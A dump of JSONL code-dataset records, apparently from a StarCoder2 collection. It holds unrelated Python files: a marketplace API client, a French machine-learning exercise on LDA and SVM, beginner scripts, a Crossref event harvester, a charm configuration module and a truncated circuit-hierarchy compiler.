or \"supplier\" in response['users']:\n return response\n except HTTPError as e:\n if e.status_code not in [400, 403, 404]:\n raise\n return None\n\n def update_user_password(self, user_id, new_password):\n try:\n self._post(\n '/users/{}'.format(user_id),\n data={\"users\": {\"password\": new_password}}\n )\n\n logger.info(\"Updated password for user %s\", user_id)\n return True\n except HTTPError as e:\n logger.info(\"Password update failed for user %s: %s\",\n user_id, e.status_code)\n return False\n\n # Services\n\n def find_draft_services(\n self, supplier_id, service_id=None, framework=None):\n\n url = \"/draft-services?supplier_id={}\".format(supplier_id)\n\n if service_id:\n url = \"{}&service_id={}\".format(url, service_id)\n\n if framework:\n url = \"{}&framework={}\".format(url, framework)\n\n return self._get(url)\n\n def get_draft_service(self, draft_id):\n return self._get(\n \"/draft-services/{}\".format(draft_id)\n )\n\n def delete_draft_service(self, draft_id, user):\n return self._delete(\n \"/draft-services/{}\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def copy_draft_service_from_existing_service(self, service_id, user):\n return self._put(\n \"/draft-services/copy-from/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def update_draft_service(self, draft_id, service, user):\n return self._post(\n \"/draft-services/{}\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n \"services\": service,\n })\n\n def publish_draft_service(self, draft_id, user):\n return self._post(\n \"/draft-services/{}/publish\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def create_new_draft_service(self, framework_slug, supplier_id, user, lot):\n return self._post(\n \"/draft-services/{}/create\".format(framework_slug),\n data={\n \"update_details\": {\n \"updated_by\": user\n },\n \"services\": {\n \"supplierId\": supplier_id,\n \"lot\": lot\n }\n\n })\n\n def get_archived_service(self, archived_service_id):\n return self._get(\"/archived-services/{}\".format(archived_service_id))\n\n def get_service(self, service_id):\n try:\n return self._get(\n \"/services/{}\".format(service_id))\n except HTTPError as e:\n if e.status_code != 404:\n raise\n return None\n\n def find_services(self, supplier_id=None, page=None):\n params = {}\n if supplier_id is not None:\n params['supplier_id'] = supplier_id\n if page is not None:\n params['page'] = page\n\n return self._get(\n self.base_url + \"/services\",\n params=params)\n\n def import_service(self, service_id, service, user, reason):\n return self._put(\n \"/services/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n \"services\": service,\n })\n\n def update_service(self, service_id, service, user, reason):\n return self._post(\n \"/services/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n \"services\": service,\n })\n\n def update_service_status(self, service_id, status, user, reason):\n return self._post(\n \"/services/{}/status/{}\".format(service_id, status),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n })\n","sub_path":"dmutils/apiclient/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309134030","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nimport matplotlib.transforms as mtransforms\nimport sklearn as sk\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n\n\n##### I\\ Génération de données #####\n\nnp.random.seed(123)\n\nmu0 = (0,0)\nmu1 = (3,2)\nsigma = [[1,1/2],[1/2,1]]\n\ndef getData(mu0, mu1, sigma0, sigma1, nbObs0, nbObs1):\n labels = np.concatenate((np.repeat(0,nbObs0) , np.repeat(1,nbObs1)), axis = None)\n c0Data = np.random.multivariate_normal(mu0, sigma0, nbObs0)\n c1Data = np.random.multivariate_normal(mu1, sigma1, nbObs1)\n cData = np.concatenate((c0Data, c1Data), axis = 0)\n return([cData, labels])\n\nmu0, mu1, sigma0, sigma1= mu0, mu1, sigma, sigma\n\ntrainData, trainLabel = getData(mu0, mu1, sigma0, sigma1, 10, 10)\ntestData, testLabel = getData(mu0, mu1, sigma0, sigma1, 1000, 1000)\n\n#plt.scatter(testData[:,0], testData[:,1], c = testLabel)\n#plt.show()\n\n##### II\\ Analyse Discriminante Linéaire #####\n\n#Qu1 : \n\ndef muhat(classId, data, labelList):\n dt = data[labelList == classId]\n res = np.sum(dt, axis=0)/len(dt)\n return(res)\n\ndef sigmahat(classId, data, labelList):\n mu = muhat(classId, data, labelList)\n dt = data[labelList == classId]\n matrix = [np.dot(np.transpose(np.array([x]) - mu), np.array([x]) - mu) for x in dt]\n return (sum(matrix)/len(dt))\n\ndef pihat(classId, data, labelList):\n\tdt = data [labelList == classId]\n\treturn len(dt)/len(data)\n\ndef weighted_Sigma_Hat (sigma0, sigma1, nbObs0, nbObs1) :\n return np.dot((np.dot(nbObs0,sigma0) + np.dot(nbObs1,sigma1)), 1/(nbObs0+nbObs1))\n\ndef LDA(x):\n #moyenne\n mu0 = muhat(0, trainData, trainLabel)\n mu1 = muhat(1, trainData, trainLabel)\n #covariance\n sigma0 = sigmahat(0, trainData, trainLabel)\n sigma1 = sigmahat(1, trainData, trainLabel)\n \n #covariance pondérée\n sigma = weighted_Sigma_Hat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1))\n \n #proportion des classes\n pi0 = pihat(0, trainData, trainLabel)\n pi1 = pihat(1, trainData, trainLabel)\n\n delta0 = (np.dot(np.transpose(x), np.dot(np.linalg.inv(sigma), mu0))) - 0.5 * (np.dot(np.transpose(mu0),np.dot(np.linalg.inv(sigma), mu0))) + np.log10(pi0)\n delta1 = (np.dot(np.transpose(x),np.dot(np.linalg.inv(sigma), mu1))) - 0.5 * (np.dot(np.transpose(mu1),np.dot(np.linalg.inv(sigma), mu1))) + np.log10(pi1)\n \n #décision\n if (delta1 > delta0) :\n return 1\n else :\n return 0\n\n \ndef classificationRate(data, labelList):\n rightPrediction = 0\n\n for i in range(0, len(data)) :\n if(LDA (np.transpose(np.asmatrix(data[i]))) == labelList[i]) :\n rightPrediction += 1\n \n rate = rightPrediction/len(data)\n return rate\n\ndef classificationRateUsingSklearn(data, labelList) :\n rightPrediction = 0\n \n clf = LinearDiscriminantAnalysis()\n clf.fit(trainData, trainLabel).score(data, labelList)\n\n for i in range(0, len(data)) :\n if(clf.predict(np.asmatrix(data[i])) == labelList[i]) :\n rightPrediction += 1\n\n rate = rightPrediction/len(data)\n return rate\n\nprint(\"LDA Apprentissage Rate: \",classificationRate(trainData, trainLabel))\nprint(\"LDA Test Rate: \", classificationRate(testData, testLabel))\nprint(\"LDA SKLEARN Apprentissage Rate: \", classificationRateUsingSklearn(trainData, trainLabel))\nprint(\"LDA SKLEARN Test Rate: \", classificationRateUsingSklearn(testData, testLabel))\n\n##############################################################################\n#Qu2 : \n\n#Ajout du point (-10, -10)\n\ntrainData[0] = [-10]\n\n#Calcul des paramètres à nouveau\n\n#means\nmuhat0 = muhat(0, trainData, trainLabel)\n#print(muhat0)\n\n#covariance\nsigma0 = sigmahat(0, trainData, trainLabel)\n#print(sigma0)\n\n#covariance pondérée\nsigma = weighted_Sigma_Hat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1))\n#print(sigma)\nprint(\"LDA Apprentissage Rate après l'ajout du point (-10, -10) : \",classificationRate(trainData, trainLabel))\nprint(\"LDA Test Rate du point (-10, -10): \", classificationRate(testData, testLabel))\n\n#Commentaire : \n\n#Le point aberrant (-10,-10) influence les paramètres de la LDA, cela diminue les performances et l'efficacité de notre méthode LDA (sensible aux données aberrantes)\n##############################################################################\n\n#Qu3 Tracer la frontière de décision \n\n\ndef decisionBoudary(data, labelList):\n #means\n mu0 = muhat(0, data, labelList)\n mu1 = muhat(1, data, labelList)\n #proportion of classes\n pi0 = pihat(0, data, labelList)\n pi1 = pihat(1, data, labelList)\n #covariance\n sigma0 = sigmahat(0, data, labelList)\n sigma1 = sigmahat(1, data, labelList)\n #weighted covariance \n sigma = weighted_Sigma_Hat(sigma0, sigma1, 10,10)\n #x coefficient\n w = np.dot(np.linalg.inv(sigma),(mu0-mu1))\n #w coordinates \n alpha = w[0]\n beta = w[1]\n #b \n b = -0.5 * np.dot((mu0-mu1), np.dot(np.linalg.inv(sigma),(mu0+mu1))) + np.log10(pi0/pi1)\n #x coordinates \n return [[0,-b/beta],[-b/alpha, 0]]\n\ndef drawDecisionBoundary(data, labelList) :\n p1,p2 = decisionBoudary(trainData, trainLabel)\n x_list = [p1[0], p2[0]]\n y_list = [p1[1], p2[1]]\n x_list2 = [p2[0], 2*p2[0] - p1[0]]\n y_list2 = [p2[1], 2*p2[1] - p1[1]]\n fig, ax = plt.subplots()\n ax.scatter(data[:,0], data[:,1], c = labelList)\n line = mlines.Line2D(x_list, y_list, color='black')\n line2 = mlines.Line2D(x_list2, y_list2, color='black')\n ax.add_line(line)\n ax.add_line(line2)\n plt.show()\n \n#Cas sans la donnée aberrante \ntrainData[0] = [0.44151096, 1.4388564] \ndecisionBoudary(trainData, trainLabel)\ndrawDecisionBoundary(testData, testLabel)\n#Cas avec la donnée aberrante \ntrainData[0] = [-10]\ndecisionBoudary(trainData, trainLabel)\ndrawDecisionBoundary(testData, testLabel)\n\n#Commentaire : \n#Le point aberrant modifie complétement la direction de la frontière de décision.\n#On remarque que la frontière de décision avec la valeur aberrante n'est \n#pas bonne en rajoutant les données de test (voir la figure)\n\n\n##############################################################################@\n#Qu4\n\n### Les performances de l'analyse discriminante linéiare vont décroitre lorsque :\n## - le nombre d'observations dans les données d'apprentissage est faible\n## - les matrices de covariance entre les classes sont très différentes\n### Cette méthode généralise LDA pour lambda = 1 (et sigma1=sigma2)\n\n\n###################################\n\n\n\n\n\n#print(classificationRateBis(testData, testLabel))\n\n##############################################################################@\n#Qu5\ndef variantWeightedSigmaHat (sigma0, sigma1, nbObs0, nbObs1, param) :\n return np.dot(param, np.dot((np.dot(nbObs0,sigma0) + np.dot(nbObs1,sigma1)), 1/(nbObs0+nbObs1))) + np.dot((1-param), np.identity(2))\n\n#\ndef variantLDA(x, param):\n #moyenne\n mu0 = muhat(0, trainData, trainLabel)\n mu1 = muhat(1, trainData, trainLabel)\n #covariance\n sigma0 = sigmahat(0, trainData, trainLabel)\n sigma1 = sigmahat(1, trainData, trainLabel)\n \n #covariance pondérée\n sigma = variantWeightedSigmaHat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1), param)\n \n #proportion des classes\n pi0 = pihat(0, trainData, trainLabel)\n pi1 = pihat(1, trainData, trainLabel)\n\n delta0 = (np.dot(np.transpose(x), np.dot(np.linalg.inv(sigma), mu0))) - 0.5 * (np.dot(np.transpose(mu0),np.dot(np.linalg.inv(sigma), mu0))) + np.log10(pi0)\n delta1 = (np.dot(np.transpose(x),np.dot(np.linalg.inv(sigma), mu1))) - 0.5 * (np.dot(np.transpose(mu1),np.dot(np.linalg.inv(sigma), mu1))) + np.log10(pi1)\n \n #décision\n if (delta1 > delta0) :\n return 1\n else :\n return 0\n\ndef classificationRateBis2(data, labelList, param):\n rightPrediction = 0\n\n for i in range(0, len(data)) :\n if(variantLDA(np.transpose(np.asmatrix(data[i])), param) == labelList[i]) :\n rightPrediction += 1\n \n rate = rightPrediction/len(data)\n return rate\n\n#print(classificationRateBis2(testData, testLabel, 0.5))\n#print(classificationRateBis2(testData, testLabel, 1)) ## classic LDA\n\n\ndef variantLDAGraph():\n graph = []\n for i in range (0, 101) : \n graph.append([i*0.01, classificationRateBis2(testData, testLabel, i*0.01)])\n numpyGraph = np.array(graph)\n plt.scatter(numpyGraph[:,0], numpyGraph[:,1])\n plt.show()\n\n#variantLDAGraph()\n##############################################################################@\n#Qu 6\ndef crossValidation(dataList, labelList) :\n #teta i : lambda entre 0 et 1\n teta = np.linspace(0,1,10)\n tetaClassificationRate = np.empty(len(teta))\n \n for i in range (0, dataList.shape[0]) :\n test_data = dataList[i]\n test_label = [labelList[i]]\n train_data = np.delete(dataList, i, axis = 0)\n label_data = np.delete(labelList, i)\n for teta_I in range (0, len(teta)) :\n tetaClassificationRate[teta_I] = tetaClassificationRate[teta_I] + classificationRate(np.asmatrix(test_data), test_label)\n \n tetaClassificationRate = tetaClassificationRate/dataList.shape[0]\n print(\"Taux de bonne classification teta = \", teta, \" taux : \", tetaClassificationRate)\n \n \n######## III/ A VOUS DE JOUER ########################\n\n#Qu1 : \n#1er classifieur : SVM\n#Il s'agit à peu prêt du même concept que LDA : pour chaque entrée donnée, on doit être capable de prédire\n#si ce nouveau point fait partie de la classe 0 ou de a classe 1.\n#On choisit une frontière qui va séparer les catégories de nos points \n#Le SVM est une méthode de classification très performante quand on dispose de peu de données d'entraînement. \n#2ème classifieur : Random Forest\n\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\n\n##############################################################################@\n\n#Qu2 :\n#generate dataset\n\ntrainData, trainLabel = make_moons(n_samples=100)\ntestData, testLabel = make_blobs(n_samples=100)\n\n#Performing LDA\nclfLDA = LinearDiscriminantAnalysis()\nprint(\"LDA performance train data : \",clfLDA.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"LDA performance test data: \",clfLDA.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing SVM\nclfSVM = svm.SVC(gamma='scale')\nprint(\"SVM performance train data : \",clfSVM.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"SVM performance test data : \",clfSVM.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing The Random Forest Algorithm\nclfRFC = RandomForestClassifier(n_estimators=10, max_depth=2,random_state=0)\nprint(\"Random Forest Class. performance train data : \",clfRFC.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"Random Forest Class. performance test data : \",clfRFC.fit(trainData, trainLabel).score(testData, testLabel))\n\n#On remarque que le SVM et LE Random Forest Algorithm sont très efficace contrairement\n#quand on ne dispose que de peu de données d’entraînement\n\n\n\n##############################################################################@\n\n\n#Qu 3 : \n\n#Notre jeu de données \".txt\" contient 15 observations d'une grue qui transporte des conteneurs\n#d'un point à un autre (2 attributs prédictifs : Speed, Angle + attibut target : Power).\n#Speed : Vitesse de déplacement du conteneur: faible, moyenne et élevée \n#(faible: 1, 2, 3; moyenne: 6, 7, 8; élevée: 9, 10). \n#Angle: grand angle négatif, petit angle négatif, angle zéro, petit angle positif et grand angle positif. \n#Puissance: faible, moyenne et élevée (basse: 0,3; moyenne: 0,5; haute: 0,7). \n#L'exercice à faire sur ce jeu de données, est celui de prédire \n#la puissance de la grue en fonction de la vitesse et de l'angle afin d'éviter un accident causé potentiellement \n#par la vitesse\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n#jeu de données sous-forme de table : \n\ngrue_conteneur = pd.DataFrame(pd.read_csv(\"grue_conteneur.csv\"), columns = [\"Speed\", \"Angle\", \"Power\"])\ngrue_conteneur.head(15)\n\n##############################################################################\n\n\n\n\n#Qu 4 :\ndata = grue_conteneur[[\"Speed\", \"Angle\"]]\nlabel = grue_conteneur[\"Power\"]\n\ntrainData, testData, trainLabel, testLabel = train_test_split(data, label, test_size = 7) \n\n#Performing LDA\nclfLDA = LinearDiscriminantAnalysis()\nprint(\"LDA grue_conteneur train data : \",clfLDA.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"LDA grue_conteneur test data: \",clfLDA.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing SVM\nclfSVM = svm.SVC(gamma='scale')\nprint(\"SVM grue_conteneur train data : \",clfSVM.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"SVM grue_conteneur test data : \",clfSVM.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing The Random Forest Algorithm\nclfRFC = RandomForestClassifier(n_estimators=10, max_depth=2,random_state=0)\nprint(\"Random Forest Class. grue_conteneur train data : \",clfRFC.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"Random Forest Class. grue_conteneur test data : \",clfRFC.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Cross Validation \n\n\n\n\n\n\n\n#Comparison\n\n","sub_path":"TP-ML.py","file_name":"TP-ML.py","file_ext":"py","file_size_in_byte":13421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"118116697","text":"# CTI - 110\r\n# P3T1 - Areas of Rectangles\r\n# Charles Gaffney\r\n# 9/19/19\r\n#\r\n\r\n\r\n# Pseudocode\r\n# Ask the user for the lengths and widths of the two rectangles\r\n# Calculate the areas for both rectangles and store them in seperate variables\r\n# If one area is bigger then the other display that that one is bigger. Else display both are equal.\r\n\r\n# Asks the user for the lengths and widths of the rectangles and stores them in floats.\r\nrect1_length = float(input(\"Enter the length of the first rectangle: \"))\r\nrect1_width = float(input(\"Enter the width of the first rectangle: \"))\r\nrect2_length = float(input(\"Enter the length of the second rectangle: \"))\r\nrect2_width = float(input(\"Enter the width of the second rectangle: \"))\r\n\r\n# Calculates and displays the areas\r\nrect1_area = rect1_length * rect1_width\r\nrect2_area = rect2_length * rect2_width\r\nprint(\"The first rectangle has an area of \" + format(rect1_area, ','))\r\nprint(\"The second rectangle has an area of \" + format(rect2_area, ','))\r\n\r\n# Checks to see if one area is greater than the other or if both areas are equal\r\n# Displays the result\r\nif rect1_area > rect2_area:\r\n print(\"The first rectangle's area is greater than the second rectangle's area.\")\r\nelif rect2_area > rect1_area:\r\n print(\"The second rectangle's area is greater than the first rectangle's area.\")\r\nelse:\r\n print(\"The areas of the rectangles are equal.\")\r\n","sub_path":"P3T1_AreasOfRectangles_CharlesGaffney.py","file_name":"P3T1_AreasOfRectangles_CharlesGaffney.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374478961","text":"'''\nCreated on 2016. 10. 1.\n\n@author: Administrator\n'''\n\n# 캡슐화 : 멤버데이터에 직접 접근해 값을 R/W하지 않고 함수를 통해 RW, 데이터의 무결성을 위해...\n# property : 캡슐화의 원칙도 지켜주고 사용도 편리하도록 해준다.\n\n\nclass Calendar:\n month=0\n def setMonth(self,m):\n if m>1 or m>12:\n print('wrong month')\n else:\n self.month = m \n \n def getMonth(self):\n return self.month\n \n \nif __name__ == '__main__':\n cal = Calendar()\n cal.month = 13\n cal.setMonth(13)\n print(cal.getMonth())\n \n #파이선에서는 접근 권한자(private 등의)가 없다","sub_path":"testClass2.py","file_name":"testClass2.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"449889208","text":"from prime_test import *\n\nmaxa, maxb, length = 1, 41, 40\n\nfor a in range(-999, 1000):\n\tcopy = length\n\tfor b in set(range(1,1000)).intersection(set(range(-(copy-1)**2-a*(copy-1),1000))):\n\t\tl = 0\n\t\tn = l**2 + a*l + b\n\t\twhile is_prime_direct(n):\n\t\t\tl += 1\n\t\t\tn = l**2 + a*l + b\n\t\tif l > length:\n\t\t\tmaxa, maxb, length = a, b, l\n\t\t\tprint('Current Max Consecutive:', l, '\\nThe equation is: n^2 + (', a, ') * n + (', b, ')')\n\nprint(maxa*maxb)\nprint('Current Max Consecutive:', length, '\\nThe equation is: n^2 + (', maxa, ') * n + (', maxb, ')')","sub_path":"resource/code-samples/project-euler/0320P27.py","file_name":"0320P27.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"146210131","text":"import os,shutil,json,subprocess, datetime\nimport requests\nimport dataset\n\ndef get_crossref_refs(new=True):\n #New=True will download everything from scratch and delete any existing records\n\n collection = 'crossref_refs.ds'\n\n if new==True:\n if os.path.exists(collection)==True:\n shutil.rmtree(collection)\n\n if os.path.isdir(collection) == False:\n ok = dataset.init(collection)\n if ok == False:\n print(\"Dataset failed to init collection\")\n exit()\n\n base_url = 'https://api.eventdata.crossref.org/v1/events?mailto=data@caltech.edu&source=crossref'\n\n collected = dataset.has_key(collection,\"captured\")\n\n cursor = ''\n count = 0\n while cursor != None:\n if collected == True:\n date,err = dataset.read(collection,\"captured\")\n if err != '':\n print('error on read: '+err)\n date = date['captured']\n print(date)\n url = base_url + '&from-collected-date=' +date+ '&cursor='+cursor\n else:\n url = base_url + '&cursor='+cursor\n print(url)\n r = requests.get(url)\n records = r.json()\n if records['status'] == 'failed':\n print(records)\n break\n for rec in records['message']['events']:\n #Save results in dataset\n print(count,rec['id'])\n count = count + 1 #Just for prettyness\n err = dataset.create(collection,rec['id'],rec)\n if err != '':\n print(\"Error in saving record: \"+err)\n\n if cursor == records['message']['next-cursor']: \n # Catches bug where we get the same curser back at end of results\n break\n cursor = records['message']['next-cursor']\n\n if collected == True:\n \n date,err = dataset.read(collection,\"captured\")\n if err != '':\n print(\"Error in reading date: \"+err)\n date = date['captured']\n\n #Check Deleted\n cursor = ''\n while cursor != None:\n del_url = 'https://api.eventdata.crossref.org/v1/events/deleted?mailto=data@caltech.edu&source=crossref'\n full = del_url + '&from-collected-date=' +date+ '&cursor='+cursor\n r = requests.get(full)\n for rec in records['message']['events']:\n #Delete results in dataset\n print(\"Deleted: \",rec['id'])\n err = dataset.delete(collection,rec['id'],rec)\n if err !=\"\":\n print(f\"Unexpected error on read: {err}\")\n cursor = records['message']['next-cursor']\n\n #Check Edited\n cursor = ''\n while cursor != None:\n del_url = 'https://api.eventdata.crossref.org/v1/events/edited?mailto=data@caltech.edu&source=crossref'\n full = del_url + '&from-collected-date=' +date+ '&cursor='+cursor\n r = requests.get(full)\n for rec in records['message']['events']:\n #Delete results in dataset\n print(\"Update: \",rec['id'])\n err = dataset.update(collection,rec['id'],rec)\n if err !=\"\":\n print(f\"Unexpected error on write: {err}\")\n cursor = records['message']['next-cursor']\n\n date = datetime.date.today().isoformat()\n record = {\"captured\":date}\n if dataset.has_key(collection,\"captured\"):\n err = dataset.update(collection,'captured',record)\n if err !=\"\":\n print(f\"Unexpected error on update: {err}\")\n else:\n err = dataset.create(collection,'captured',record)\n if err !=\"\":\n print(f\"Unexpected error on create: {err}\")\n definition = os.path.join(os.path.dirname(__file__),'crossref_refs.json')\n err = dataset.indexer(collection,collection+'.bleve',definition)\n if err !=\"\":\n print(f\"Unexpected error on index: {err}\")\n\n","sub_path":"ames/harvesters/crossref_refs.py","file_name":"crossref_refs.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"149474453","text":"#!/Library/Frameworks/Python.framework/Versions/3.5/bin/python3\nimport json\nimport sys\nimport re\n\ndict_p = \"open_platform_dict.json\"\n\ndef cmp(x,y):\n if x < y:\n return -1\n elif x == y:\n return 0\n else:\n return 1\n\ndef sorted_tags(top = 10):\n df = open(dict_p, \"r\")\n ori_json = json.loads(df.read())\n tags = []\n app_tags = []\n content_tags = []\n for i in ori_json[\"recommendationHotWords\"]:\n app_tags = list(app_tags + i[\"tags\"])\n #print(len(i[\"tags\"]), i[\"name\"], i[\"tags\"])\n for i in ori_json[\"appHotWords\"]:\n content_tags = list(content_tags + i[\"tags\"])\n #print(len(i[\"tags\"]), i[\"name\"], i[\"tags\"])\n app_tags = list(set(app_tags))\n content_tags = list(set(content_tags))\n app_tags.sort(key=len, reverse=True)\n content_tags.sort(key=len, reverse=True)\n\n '''\n for k in ori_json.keys():\n for i in ori_json[k]:\n tags = list(tags + i[\"tags\"])\n #tags.sort(lambda x,y: cmp(len(x), len(y))))\n orig_tags = tags\n tags.sort(key=len, reverse=True)\n\n if len(tags)-1 < top:\n top = len(tags) - 1\n df.close()\n return tags[0:top], orig_tags\n '''\n return app_tags,content_tags\n\ndef search_tags(t):\n pat = re.compile(\"^.*\"+t+\".*$\")\n app_tag_list, content_tag_list = sorted_tags()\n\n hit_app_tags = []\n hit_content_tag = []\n print(\"app tags:\")\n for i in app_tag_list:\n if pat.match(i):\n hit_app_tags.append(i)\n print(i)\n\n print(\"----------\")\n print(\"content tags:\")\n for i in content_tag_list:\n if pat.match(i):\n hit_content_tag.append(i)\n print(i)\n\n\n\nif __name__ == \"__main__\":\n #t = sys.argv[1]\n t = \"kcrw\"\n search_tags(t)","sub_path":"tags_sort.py","file_name":"tags_sort.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"500846419","text":"import asyncio\nimport argparse\nimport logging\nimport sys\n\nimport zaza.charm_lifecycle.utils as utils\n\n\ndef run_configure_list(functions):\n \"\"\"Run the configure scripts as defined in the list of test classes in\n series.\n\n :param functions: List of configure functions functions\n :type tests: ['zaza.charms_tests.svc.setup', ...]\n \"\"\"\n for func in functions:\n utils.get_class(func)()\n\n\ndef configure(model_name, functions):\n \"\"\"Run all post-deployment configuration steps\n\n :param functions: List of configure functions functions\n :type tests: ['zaza.charms_tests.svc.setup', ...]\"\"\"\n utils.set_juju_model(model_name)\n run_configure_list(functions)\n\n\ndef parse_args(args):\n \"\"\"Parse command line arguments\n\n :param args: List of configure functions functions\n :type list: [str1, str2,...] List of command line arguments\n :returns: Parsed arguments\n :rtype: Namespace\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--configfuncs', nargs='+',\n help='Space sperated list of config functions',\n required=False)\n parser.add_argument('-m', '--model-name', help='Name of model to remove',\n required=True)\n return parser.parse_args(args)\n\n\ndef main():\n \"\"\"Run the configuration defined by the command line args or if none were\n provided read the configuration functions from the charms tests.yaml\n config file\"\"\"\n logging.basicConfig(level=logging.INFO)\n args = parse_args(sys.argv[1:])\n funcs = args.configfuncs or utils.get_charm_config()['configure']\n configure(args.model_name, funcs)\n asyncio.get_event_loop().close()\n","sub_path":"zaza/charm_lifecycle/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"7058580","text":"import pathlib\nimport pprint\n\nfrom .util import _write_circuit_graph, max_connectivity\nfrom .read_netlist import SpiceParser\nfrom .match_graph import read_inputs, read_setup,_mapped_graph_list,add_stacked_transistor,add_parallel_transistor,reduce_graph,define_SD,check_nodes,add_parallel_caps,add_series_res\nfrom .write_verilog_lef import WriteVerilog, WriteSpice, print_globals,print_header,generate_lef\nfrom .common_centroid_cap_constraint import WriteCap, check_common_centroid\nfrom .write_constraint import WriteConst, FindArray, CopyConstFile, FindSymmetry\nfrom .read_lef import read_lef\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef generate_hierarchy(netlist, subckt, output_dir, flatten_heirarchy, unit_size_mos , unit_size_cap):\n updated_ckt_list,library = compiler(netlist, subckt, flatten_heirarchy)\n return compiler_output(netlist, library, updated_ckt_list, subckt, output_dir, unit_size_mos , unit_size_cap)\n\ndef compiler(input_ckt:pathlib.Path, design_name:str, flat=0,Debug=True):\n \"\"\"\n Reads input spice file, converts to a graph format and create hierarchies in the graph \n\n Parameters\n ----------\n input_ckt : input circuit path\n DESCRIPTION.\n design_name : name of top level subckt in design\n DESCRIPTION.\n flat : TYPE, flat/hierarchical\n DESCRIPTION. The default is 0.\n Debug : TYPE, writes output graph for debug\n DESCRIPTION. The default is False.\n\n Returns\n -------\n updated_ckt_list : list of reduced graphs for each subckt\n DESCRIPTION. reduced graphs are subckts after identification of hierarchies\n library : TYPE, list of library graphs\n DESCRIPTION.libraries are used to create hierarchies\n\n \"\"\"\n logger.info(\"Starting topology identification...\")\n input_dir=input_ckt.parents[0]\n logger.debug(f\"Reading subckt {input_ckt}\")\n sp = SpiceParser(input_ckt, design_name, flat)\n circuit = sp.sp_parser()[0]\n\n design_setup=read_setup(input_dir / f'{input_ckt.stem}.setup')\n logger.debug(f\"template parent path: {pathlib.Path(__file__).parent}\")\n lib_path=pathlib.Path(__file__).resolve().parent.parent / 'config' / 'basic_template.sp'\n logger.debug(f\"template library path: {lib_path}\")\n basic_lib = SpiceParser(lib_path)\n library = basic_lib.sp_parser()\n lib_path=pathlib.Path(__file__).resolve().parent.parent / 'config' / 'user_template.sp'\n user_lib = SpiceParser(lib_path)\n library += user_lib.sp_parser()\n library=sorted(library, key=lambda k: max_connectivity(k[\"graph\"]), reverse=True)\n logger.info(f\"dont use cells: {design_setup['DONT_USE_CELLS']}\")\n logger.info(f\"all library elements: {[ele['name'] for ele in library]}\")\n if len(design_setup['DONT_USE_CELLS'])>0:\n library=[lib_ele for lib_ele in library if lib_ele['name'] not in design_setup['DONT_USE_CELLS']]\n\n if Debug==True:\n _write_circuit_graph(circuit[\"name\"], circuit[\"graph\"],\n \"./circuit_graphs/\")\n for lib_circuit in library:\n _write_circuit_graph(lib_circuit[\"name\"], lib_circuit[\"graph\"],\n \"./circuit_graphs/\")\n hier_graph_dict=read_inputs(circuit[\"name\"],circuit[\"graph\"])\n\n updated_ckt_list = []\n check_duplicates={}\n for circuit_name, circuit in hier_graph_dict.items():\n logger.debug(f\"START MATCHING in circuit: {circuit_name}\")\n G1 = circuit[\"graph\"]\n if circuit_name in design_setup['DIGITAL']:\n mapped_graph_list = _mapped_graph_list(G1, library, design_setup['POWER']+design_setup['GND'] ,design_setup['CLOCK'], True )\n else:\n define_SD(G1,design_setup['POWER'],design_setup['GND'], design_setup['CLOCK'])\n logger.debug(f\"no of nodes: {len(G1)}\")\n add_parallel_caps(G1)\n add_series_res(G1)\n add_stacked_transistor(G1)\n add_parallel_transistor(G1)\n initial_size=len(G1)\n delta =1\n while delta > 0:\n logger.debug(\"CHECKING stacked transistors\")\n add_stacked_transistor(G1)\n 